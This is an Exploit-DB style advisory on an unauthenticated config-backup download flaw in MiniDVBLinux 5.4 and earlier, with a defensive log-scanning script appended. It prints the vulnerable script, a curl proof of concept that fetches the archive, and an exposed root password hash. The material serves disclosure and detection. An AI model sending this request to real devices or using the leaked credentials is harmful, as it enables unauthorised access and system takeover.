MiniDVBLinux <=5.4 - Config Download Exploit

  • Author: LiquidWorm
    Date: 2023-03-27
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/51091/
  • # Exploit Title: MiniDVBLinux <=5.4 Config Download Exploit
    # Exploit Author: LiquidWorm
    
    
    Vendor: MiniDVBLinux
    Product web page: https://www.minidvblinux.de
    Affected version: <=5.4
    
    Summary: MiniDVBLinux(TM) Distribution (MLD). MLD offers a simple
    way to convert a standard PC into a Multi Media Centre based on the
    Video Disk Recorder (VDR) by Klaus Schmidinger. Features of this
    Linux based Digital Video Recorder: Watch TV, Timer controlled
    recordings, Time Shift, DVD and MP3 Replay, Setup and configuration
    via browser, and a lot more. MLD strives to be as small as possible,
    modular, simple. It supports numerous hardware platforms, like classic
    desktops in 32/64bit and also various low power ARM systems.
    
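    Desc: The application is vulnerable to unauthenticated configuration
    download when a direct object reference is made to the backup function
    using an HTTP GET request. The script listed below exports and returns
    the configuration archive as soon as action=getconfig is supplied; it
    contains no authentication check of its own. This will enable the
    attacker to disclose sensitive information and help her in
    authentication bypass, privilege escalation and full system access.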
    
    ====================================================================
    /var/www/tpl/setup/Backup/Edit\ backup/51_download_backup.sh:
    ------------------------------------------------------------
    <?
    if [ "$GET_action" = "getconfig" ]; then
    . /etc/rc.config
    header "Content-Type: application/x-compressed-tar"
    header "Content-Disposition: filename=`date +%Y-%m-%d_%H%M_$HOST_NAME`_config.tgz"
    /usr/bin/backup-config.sh export /tmp/backup_config_$$.tgz &>/dev/null
    cat /tmp/backup_config_$$.tgz
    rm -rf /tmp/backup_config*
    exit
    fi
    ?>
    <div class="button"><input type="button" value="$(TEXTDOMAIN="backup-www" gt 'Download')" title="$(TEXTDOMAIN="backup-www" gt 'Download a archive of your config')" onclick="window.open('/tpl/setup/Backup/Edit backup/51_download_backup.sh?action=getconfig'); call('')"/></div>
    
    ====================================================================
    
    Tested on: MiniDVBLinux 5.4
     BusyBox v1.25.1
     Architecture: armhf, armhf-rpi2
     GNU/Linux 4.19.127.203 (armv7l)
     VideoDiskRecorder 2.4.6
    
    
    Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
    @zeroscience
    
    
    Advisory ID: ZSL-2022-5713
    Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5713.php
    
    
    24.09.2022
    
    --
    
    
    > curl http://ip:8008/tpl/setup/Backup/Edit%20backup/51_download_backup.sh?action=getconfig -o config.tgz
    > mkdir configdir
    > tar -xvzf config.tgz -C .\configdir
    > cd configdir && cd etc
    > type passwd
    root:$1$ToYyWzqq$oTUM6EpspNot2e1eyOudO0:0:0:root:/root:/bin/sh
    daemon:!:1:1::/:
    ftp:!:40:2:FTP account:/:/bin/sh
    user:!:500:500::/home/user:/bin/sh
    nobody:!:65534:65534::/tmp:
    _rpc:x:107:65534::/run/rpcbind:/usr/sbin/nologin
    >
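
A defender-side check for the request shown above, as an added example that is not part of the original advisory: it scans a web access log for requests to the backup script with action=getconfig, normalising URL encoding first so that `Edit%20backup` and `Edit backup` both match. The function names, the sample log lines and the Common/Combined Log Format input are assumptions; the advisory does not describe how the device logs requests.

```shell
#!/bin/sh
# Added example (not from the advisory): flag backup-download requests in an access log.
# Assumption: Common/Combined Log Format on stdin; the MLD web server may log differently.

find_config_downloads() {
    awk '
    function hexval(c) { return index("0123456789abcdef", tolower(c)) - 1 }
    # Decode %XX so "Edit%20backup" and "Edit backup" compare equal.
    function urldecode(s,    out, c, hi, lo) {
        out = ""
        while (length(s) > 0) {
            c = substr(s, 1, 1)
            hi = hexval(substr(s, 2, 1)); lo = hexval(substr(s, 3, 1))
            if (c == "%" && length(s) >= 3 && hi >= 0 && lo >= 0) {
                out = out sprintf("%c", hi * 16 + lo); s = substr(s, 4)
            } else { out = out c; s = substr(s, 2) }
        }
        return out
    }
    {
        # Request field: "METHOD target HTTP/x.y" (target may hold a raw space).
        if (!match($0, /"[A-Z]+ .* HTTP\/[0-9.]+"/)) next
        req  = substr($0, RSTART + 1, RLENGTH - 2)
        rest = substr($0, RSTART + RLENGTH + 1)
        split(rest, tail, " ")                 # tail[1]=status, tail[2]=bytes
        sub(/^[A-Z]+ /, "", req); sub(/ HTTP\/[0-9.]+$/, "", req)
        q = index(req, "?"); if (q == 0) next  # no query string, no export
        path  = urldecode(substr(req, 1, q - 1))
        query = "&" urldecode(substr(req, q + 1)) "&"
        if (path !~ /\/51_download_backup\.sh$/) next
        if (index(query, "&action=getconfig&") == 0) next
        # Status 200 is treated as served; any other status as an attempt.
        verdict = (tail[1] == "200") ? "SERVED" : "ATTEMPT"
        printf "%s\t%s\t%s\t%s\n", verdict, $1, tail[1], tail[2]
    }'
}

# Constructed sample log lines (documentation IP ranges, made-up sizes).
sample_log() {
    cat <<'EOF'
192.0.2.10 - - [24/Sep/2022:10:00:01 +0000] "GET /tpl/setup/Backup/Edit%20backup/51_download_backup.sh?action=getconfig HTTP/1.1" 200 48213
192.0.2.10 - - [24/Sep/2022:10:00:05 +0000] "GET /index.sh HTTP/1.1" 200 1532
198.51.100.7 - - [24/Sep/2022:10:02:11 +0000] "GET /tpl/setup/Backup/Edit backup/51_download_backup.sh?lang=en&action=getconfig HTTP/1.1" 403 0
203.0.113.5 - - [24/Sep/2022:10:03:00 +0000] "GET /tpl/setup/Backup/Edit%20backup/51_download_backup.sh HTTP/1.1" 200 912
EOF
}

sample_log | find_config_downloads
```

Any `SERVED` hit from a client that had not logged in means the archive, including the `passwd` file shown in the session above, should be treated as disclosed and the credentials in it rotated.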